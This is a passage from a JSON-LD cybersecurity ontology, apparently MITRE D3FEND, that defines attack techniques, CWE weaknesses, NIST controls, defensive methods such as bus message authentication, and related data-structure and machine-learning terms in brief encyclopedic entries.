      "d3f:definition": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.",
      "rdfs:label": "Archive via Utility",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1560"
        },
        {
          "@id": "_:Nd8f3aa02c8064f3089722d3457d3c8b8"
        }
      ]
    },
    {
      "@id": "_:Nd8f3aa02c8064f3089722d3457d3c8b8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ArchiveFile"
      }
    },
    {
      "@id": "d3f:SoftwareWatchdogTimer",
      "@type": "owl:Class",
      "d3f:definition": "A software watchdog timer is a watchdog timer implemented in software.",
      "rdfs:label": "Software Watchdog Timer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RuntimeVariable"
        },
        {
          "@id": "d3f:SoftwareTimer"
        },
        {
          "@id": "d3f:WatchdogTimer"
        }
      ]
    },
    {
      "@id": "d3f:CWE-28",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-28",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \"..\\\" sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '..\\filedir'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:T1553.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1553.006",
      "d3f:definition": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.",
      "rdfs:label": "Code Signing Policy Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:T1553"
      }
    },
    {
      "@id": "d3f:DE-0003.08",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.08",
      "d3f:definition": "Spacecraft typically maintain histories of accepted, rejected, and executed commands, buffers, logs, or file records that can be downlinked on demand or periodically. An adversary conceals activity by editing or pruning these artifacts: removing entries, altering opcodes or arguments, rewriting timestamps and source identifiers, rolling logs early, or repopulating with benign-looking commands to balance counters. Related acknowledgments and event records may be suppressed or reclassified so cross-checks appear consistent. After manipulation, the official command history shows a plausible narrative that omits or mischaracterizes the adversary’s actions.",
      "d3f:modifies": {
        "@id": "d3f:CommandHistoryLog"
      },
      "rdfs:label": "Received Commands - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/08/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:N40a1f5515778431a905cb6496eea7c0b"
        }
      ],
      "skos:prefLabel": "Received Commands"
    },
    {
      "@id": "_:N40a1f5515778431a905cb6496eea7c0b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CommandHistoryLog"
      }
    },
    {
      "@id": "d3f:T1546.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.002",
      "d3f:creates": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:definition": "Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in <code>C:\\Windows\\System32\\</code>, and <code>C:\\Windows\\sysWOW64\\</code>  on 64-bit Windows systems, along with screensavers included with base Windows installations.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Screensaver",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:Nb07f35ecd4a247deb47f572fa9951079"
        },
        {
          "@id": "_:N16a9d6e560c64104b624a289cdbf7d31"
        }
      ]
    },
    {
      "@id": "_:Nb07f35ecd4a247deb47f572fa9951079",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:N16a9d6e560c64104b624a289cdbf7d31",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CWE-1083",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1083",
      "d3f:definition": "The product is intended to manage data access through a particular data manager component such as a relational or non-SQL database, but it contains code that performs data access operations without using that component.",
      "rdfs:label": "Data Access from Outside Expected Data Manager Component",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1061"
      }
    },
    {
      "@id": "d3f:T0882",
      "@type": "owl:Class",
      "d3f:attack-id": "T0882",
      "d3f:definition": "Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations.    In the Bowman Dam incident, adversaries probed systems for operational data. (Citation: Mark Thompson March 2016) (Citation: Danny Yadron December 2015)",
      "rdfs:label": "Theft of Operational Information - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Theft of Operational Information"
    },
    {
      "@id": "d3f:DatabaseFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Database"
      },
      "d3f:definition": "A file that stores data and metadata in an organized format, managed by a database management system.",
      "rdfs:label": "Database File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:N7142ee940fde434eb324c022aa6ef681"
        }
      ]
    },
    {
      "@id": "_:N7142ee940fde434eb324c022aa6ef681",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:AuthenticationService",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authenticates": {
        "@id": "d3f:Host"
      },
      "d3f:definition": "An authentication service is a mechanism, analogous to the use of passwords on time-sharing systems, for the secure authentication of the identity of network clients by servers and vice versa, without presuming the operating system integrity of either (e.g., Kerberos).",
      "rdfs:isDefinedBy": {
        "@id": "https://www.gartner.com/en/information-technology/glossary/authentication-service"
      },
      "rdfs:label": "Authentication Service",
      "rdfs:seeAlso": {
        "@id": "dbr:Authentication"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplicationProcess"
        },
        {
          "@id": "_:N1a0d2f9aa09c415d83bbb61ef24bca61"
        }
      ]
    },
    {
      "@id": "_:N1a0d2f9aa09c415d83bbb61ef24bca61",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Object Security and Privacy Attributes",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(1)"
    },
    {
      "@id": "d3f:PageTable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:PhysicalAddress"
        },
        {
          "@id": "d3f:VirtualAddress"
        }
      ],
      "d3f:definition": "A page table  is the data structure used by the MMU in a virtual memory computer system  to store the mapping between virtual addresses (virtual pages) and physical addresses (page frames).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Page_table"
      },
      "rdfs:label": "Page Table",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N8c2e867cf84c46858a77bb599d712d84"
        },
        {
          "@id": "_:Nca4cec30d93a4fb588157ad0289ee11a"
        }
      ]
    },
    {
      "@id": "_:N8c2e867cf84c46858a77bb599d712d84",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalAddress"
      }
    },
    {
      "@id": "_:Nca4cec30d93a4fb588157ad0289ee11a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VirtualAddress"
      }
    },
    {
      "@id": "d3f:monitors",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x monitors y: The technique or agent x keep tabs on, keeps an eye on, or keeps the digital artifact y under surveillance.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02167732-v"
      },
      "rdfs:label": "monitors",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:detects"
        }
      ]
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-005%3AClearPowershellConsoleCommandHistory_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-005/"
      },
      "d3f:kb-abstract": "Adversaries may attempt to conceal their tracks by deleting the history of commands run within the Powershell console, or turning off history saving to begin with. This analytic looks for several commands that would do this. This does not capture the event if it is done within the console itself; only commandline-based commands are detected. Note that the command to remove the history file directly may very a bit if the history file is not saved in the default path on a particular system.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-005: Clear Powershell Console Command History",
      "rdfs:label": "Reference - CAR-2020-11-005: Clear Powershell Console Command History - MITRE"
    },
    {
      "@id": "d3f:CCI-000185_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for PKI-based authentication, validates certifications by constructing and verifying a certification path to an accepted trust anchor including checking certificate status information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:CredentialHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000185"
    },
    {
      "@id": "d3f:writes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x writes y: The subject x takes the action of writing to a digital artifact y to store data and placing it into persistent memory for later reference.",
      "rdfs:label": "writes",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01000931-v"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:accesses"
      }
    },
    {
      "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://doi.org/10.6028/NIST.SP.800-53r5"
      },
      "d3f:kb-abstract": "This publication provides a catalog of security and privacy controls for information systems and organizations to protect organizational operations and assets, individuals, other organizations, and the Nation from a diverse set of threats and risks, including hostile attacks, human errors, natural disasters, structural failures, foreign intelligence entities, and privacy risks. The controls are flexible and customizable and implemented as part of an organization-wide process to manage risk. The controls address diverse requirements derived from mission and business needs, laws, executive orders, directives, regulations, policies, standards, and guidelines. Finally, the consolidated control catalog addresses security and privacy from a functionality perspective (i.e., the strength of functions and mechanisms provided by the controls) and from an assurance perspective (i.e., the measure of confidence in the security or privacy capability provided by the controls). Addressing functionality and assurance helps to ensure that information technology products and the systems that rely on those products are sufficiently trustworthy.",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:AccessPolicyAdministration"
        },
        {
          "@id": "d3f:Endpoint-basedWebServerAccessMediation"
        },
        {
          "@id": "d3f:NetworkResourceAccessMediation"
        },
        {
          "@id": "d3f:PasswordAuthentication"
        },
        {
          "@id": "d3f:Proxy-basedWebServerAccessMediation"
        },
        {
          "@id": "d3f:RemoteFileAccessMediation"
        },
        {
          "@id": "d3f:WebSessionAccessMediation"
        }
      ],
      "d3f:kb-reference-title": "NIST Special Publication 800-53 Revision 5 - Security and Privacy Controls for Information Systems and Organizations",
      "rdfs:label": "Reference - NIST Special Publication 800-53 Revision 5 - Security and Privacy Controls for Information Systems and Organizations"
    },
    {
      "@id": "d3f:HardwareDeviceDisabledEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a device transitions to an inactive or unavailable state, often due to deactivation, failure, or maintenance.",
      "rdfs:label": "Hardware Device Disabled Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceStateEvent"
        },
        {
          "@id": "_:N9c22dd1a44204bb9ada263302ef588f1"
        }
      ]
    },
    {
      "@id": "_:N9c22dd1a44204bb9ada263302ef588f1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDeviceEnabledEvent"
      }
    },
    {
      "@id": "d3f:CallStack",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:StackFrame"
      },
      "d3f:definition": "In computer science, a call stack is a stack data structure that stores information about the active subroutines of a computer program. This kind of stack is also known as an execution stack, program stack, control stack, run-time stack, or machine stack, and is often shortened to just \"the stack\". Although maintenance of the call stack is important for the proper functioning of most software, the details are normally hidden and automatic in high-level programming languages. Many computer instruction sets provide special instructions for manipulating stacks.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Call_stack"
      },
      "rdfs:label": "Call Stack",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N186e7bbdc47a48c7addbc303e02d05f8"
        }
      ]
    },
    {
      "@id": "_:N186e7bbdc47a48c7addbc303e02d05f8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:TA0035",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Collection - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Collection"
    },
    {
      "@id": "d3f:T1632",
      "@type": "owl:Class",
      "d3f:attack-id": "T1632",
      "d3f:definition": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted applications. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features include: an app being allowed to run because it is signed by a valid code signing certificate; an OS prompt alerting the user that an app came from an untrusted source; or getting an indication that you are about to connect to an untrusted site. The method adversaries use will depend on the specific mechanism they seek to subvert.",
      "rdfs:label": "Subvert Trust Controls - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Subvert Trust Controls"
    },
    {
      "@id": "d3f:Correlation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-COR",
      "d3f:definition": "Correlation is the degree to which two or more quantities are linearly associated.",
      "d3f:kb-article": "Wolfram MathWorld. (n.d.). Correlation. [Link](https://mathworld.wolfram.com/Correlation.html)",
      "rdfs:label": "Correlation",
      "rdfs:subClassOf": {
        "@id": "d3f:DescriptiveStatistics"
      }
    },
    {
      "@id": "d3f:BusMessageAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:BusMessageAuthentication"
      ],
      "d3f:authenticates": {
        "@id": "d3f:BusMessage"
      },
      "d3f:d3fend-id": "D3-BMA",
      "d3f:definition": "Applies cryptographic primitives to individual bus frames to verify the sender's identity and ensure the integrity of the data payload.",
      "d3f:kb-article": "## How it works\nBus Message Authentication functions as a continuous validation layer that operates between the physical transmission of a signal and the application layer's processing of data. Every node on a bus network is provisioned with a cryptographic key and a synchronized 'freshness' state (such as a monotonic counter). When a node prepares to transmit, it generates a Message Authentication Code (MAC) which is created by hashing the message content, the sender's unique ID, and the current freshness value using its secret key. This MAC is then appended to the outgoing frame.\n\nAs messages circulate on the bus network, receiving nodes do not immediately trust the incoming data. Instead, a hardware controller intercepts the frame and performs a real-time parallel verification. The controller re-calculates the expected MAC based on its own copy of the key and the current network freshness state. If the received MAC matches the calculated one, the message is passed to the system for further action. If the MAC is missing, incorrect, or stale (indicating a replay of an older message), the hardware silently drops the frame or triggers a security alert.\n\n## Considerations\n* Bandwidth Overhead: Adding authentication tags (MACs) and freshness values reduces the effective data throughput; this requires a trade-off between the desired security level (tag length) and the available bus capacity.\n\n* Real-Time Latency: Cryptographic processing must occur in hardware (e.g., via AES-NI, FPGA logic, or specialized ASICs) to meet the deterministic timing constraints of safety-critical systems.\n\n* Key Management: A robust mechanism for secure key storage and lifecycle management (e.g., rotation and revocation) is required to ensure that a single compromised node does not jeopardize the entire network.\n\n* Protocol Transparency: In legacy environments, authentication must often be implemented as a shim that remains compatible with existing protocol standards to avoid breaking legacy hardware.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ControllerAreaNetworkMessageAuthentication"
      },
      "rdfs:label": "Bus Message Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MessageAuthentication"
        },
        {
          "@id": "_:N4c3554aff8154eedac99923e6053ffb4"
        }
      ]
    },
    {
      "@id": "_:N4c3554aff8154eedac99923e6053ffb4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusMessage"
      }
    },
    {
      "@id": "d3f:SARSA",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SAR",
      "d3f:definition": "State-action-reward-state-action (SARSA) is an algorithm for learning a Markov decision process policy, used in the reinforcement learning area of machine learning.",
      "d3f:kb-article": "## References\nState-action-reward-state-action. Wikipedia.  [Link](https://en.wikipedia.org/wiki/State%E2%80%93action%E2%80%93reward%E2%80%93state%E2%80%93action).",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/State%E2%80%93action%E2%80%93reward%E2%80%93state%E2%80%93action"
      },
      "rdfs:label": "SARSA",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-freeReinforcementLearning"
      }
    },
    {
      "@id": "d3f:T1525",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:ContainerImage"
      },
      "d3f:attack-id": "T1525",
      "d3f:definition": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)",
      "rdfs:label": "Implant Internal Image",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:Nf1661e985600499c92bd3a71f73e6c02"
        }
      ]
    },
    {
      "@id": "_:Nf1661e985600499c92bd3a71f73e6c02",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ContainerImage"
      }
    },
    {
      "@id": "d3f:Reference-DecoyAndDeceptiveDataObjectTechnology_Cymmetria,Inc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170134423A1"
      },
      "d3f:kb-abstract": "A computer implemented method of detecting unauthorized access to a protected network by monitoring a dynamically updated deception environment, comprising launching, on one or more decoy endpoints, one or more decoy operating system (OS) managing one or more of a plurality of deception applications mapping a plurality of applications executed in a protected network, updating dynamically a usage indication for a plurality of deception data objects deployed in the protected network to emulate usage of the plurality of deception data objects for accessing the deception application(s) wherein the plurality of deception data objects are configured to trigger an interaction with the deception application(s) when used, detecting usage of data contained in the deception data object(s) by monitoring the interaction and identifying one or more potential unauthorized operations based on analysis of the detection.\n\nIn order to convince the potential attacker that the deception environment is the real (valid) processing environment and/or part thereof, the campaign manager may construct the false identity according to the public information of the certain user that may typically be available to the potential attacker. By exposing the real (public) information of the certain user to the potential attacker, the false identity may seem consistent and legitimate to the potential attacker. For example, the campaign manager may create a false account, for example, a Facebook account of the certain user that includes the same public information that is publicly available to other Facebook users from the real (genuine) Facebook account of the certain user. The fake company account may include information specific to the role and/or job title of certain user within the company, for example, a programmer, an accountant, an IT person and/or the like.",
      "d3f:kb-author": "Dean Sysman, Gadi Evron, Imri Goldberg, Itamar Sher, Shmuel Ur",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Cymmetria, Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyPersona"
      },
      "d3f:kb-reference-title": "Decoy and deceptive data object technology",
      "rdfs:label": "Reference - Decoy and deceptive data object technology - Cymmetria, Inc."
    },
    {
      "@id": "d3f:DirectPhysicalLinkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DirectPhysicalLinkMapping"
      ],
      "d3f:d3fend-id": "D3-DPLM",
      "d3f:definition": "Direct physical link mapping creates a physical link map by direct observation and recording of the physical network links.",
      "d3f:kb-article": "## How it works\n\nDirect Physical Link Mapping involves a manual process where a network engineer or administrator physically observes and documents the physical connections within the network infrastructure.\n\n## Considerations\n\n* Constructing and maintaining physical topologies for extensive networks can be challenging and time-consuming using manual methods. Therefore, where feasible, automated methods like active physical link mapping should be considered as a partial or complete solution for physical link mapping processes.\n\n* In scenarios where active physical link mapping is not an option, physical inspection of networks is necessary to accomplish physical link mapping. This is due to the lack of reliable techniques to accurately map physical links solely through passive network traffic monitoring.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NetworkMapping"
      },
      "d3f:synonym": "Manual Physical Link Mapping",
      "rdfs:label": "Direct Physical Link Mapping",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Transmission_medium"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PhysicalLinkMapping"
      }
    },
    {
      "@id": "d3f:OTReadFileCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Reads data in specified chuncks or the contents of a specified file stored in the file device connected to the PC.",
      "rdfs:label": "OT Read File Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTReadCommandEvent"
        },
        {
          "@id": "_:Nf4ee8b7db2f54f6e9fd18244d4365199"
        },
        {
          "@id": "_:Nce2d1f84b73f464a9fdc10fdc0b24e50"
        }
      ]
    },
    {
      "@id": "_:Nf4ee8b7db2f54f6e9fd18244d4365199",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:Nce2d1f84b73f464a9fdc10fdc0b24e50",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTReadFileCommand"
      }
    },
    {
      "@id": "d3f:AML.T0049",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0049",
      "d3f:definition": "Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.",
      "rdfs:label": "Exploit Public-Facing Application - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0049"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASInitialAccessTechnique"
      },
      "skos:prefLabel": "Exploit Public-Facing Application"
    },
    {
      "@id": "d3f:FTPPollEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a client queries an FTP server to check for the presence of specific files or directories without initiating a transfer.",
      "rdfs:label": "FTP Poll Event",
      "rdfs:subClassOf": {
        "@id": "d3f:FTPEvent"
      }
    },
    {
      "@id": "d3f:Semi-supervisedFeatureExtraction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSFE",
      "d3f:definition": "Feature extraction refers to reducing the number of dimensions in a data point so that it is computationally feasible and effective to learn a model.",
      "d3f:kb-article": "## References\nJashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)",
      "rdfs:label": "Semi-supervised Feature Extraction",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedPreprocessing"
      }
    },
    {
      "@id": "d3f:CWE-1232",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1232",
      "d3f:definition": "Register lock bit protection disables changes to system configuration once the bit is set. Some of the protected registers or lock bits become programmable after power state transitions (e.g., Entry and wake from low power sleep modes) causing the system configuration to be changeable.",
      "rdfs:label": "Improper Lock Behavior After Power State Transition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:NetworkResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a shared resource, or network share, is a computer resource made available from one host to other hosts on a computer network. It is a device or piece of information on a computer that can be remotely accessed from another computer, typically via a local area network or an enterprise intranet, transparently as if it were a resource in the local machine.Network sharing is made possible by inter-process communication over the network.",
      "rdfs:label": "Network Resource",
      "rdfs:seeAlso": {
        "@id": "dbr:Shared_resource"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RemoteResource"
      },
      "skos:altLabel": "Shared Resource"
    },
    {
      "@id": "d3f:CWE-401",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-401",
      "d3f:definition": "The product does not sufficiently track and release allocated memory after it has been used, making the memory unavailable for reallocation and reuse.",
      "d3f:synonym": "Memory Leak",
      "rdfs:label": "Missing Release of Memory after Effective Lifetime",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-772"
      }
    },
    {
      "@id": "d3f:CWE-1072",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1072",
      "d3f:definition": "The product accesses a data resource through a database without using a connection pooling capability.",
      "rdfs:label": "Data Resource Access without Use of Connection Pooling",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:T1623.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1623.001",
      "d3f:definition": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the underlying command prompts on Android and iOS devices. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges that are only accessible if the device has been rooted or jailbroken.",
      "rdfs:label": "Unix Shell - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1623"
      },
      "skos:prefLabel": "Unix Shell"
    },
    {
      "@id": "d3f:LocalAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An attacker who is physically near or on the premises of the target network or systems.",
      "rdfs:label": "Local Attacker",
      "rdfs:subClassOf": {
        "@id": "d3f:Attacker"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-4_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "System Monitoring | Automated Tools and Mechanisms for Real-time Analysis",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "rdfs:label": "SI-4(2)"
    },
    {
      "@id": "d3f:CWE-350",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-350",
      "d3f:definition": "The product performs reverse DNS resolution on an IP address to obtain the hostname and make a security decision, but it does not properly ensure that the IP address is truly associated with the hostname.",
      "rdfs:label": "Reliance on Reverse DNS Resolution for a Security-Critical Action",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-290"
        },
        {
          "@id": "d3f:CWE-807"
        }
      ]
    },
    {
      "@id": "d3f:T1053.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1053.007",
      "d3f:definition": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.",
      "rdfs:label": "Container Orchestration Job",
      "rdfs:subClassOf": {
        "@id": "d3f:T1053"
      }
    },
    {
      "@id": "d3f:SoftwareArtifactServer",
      "@type": "owl:Class",
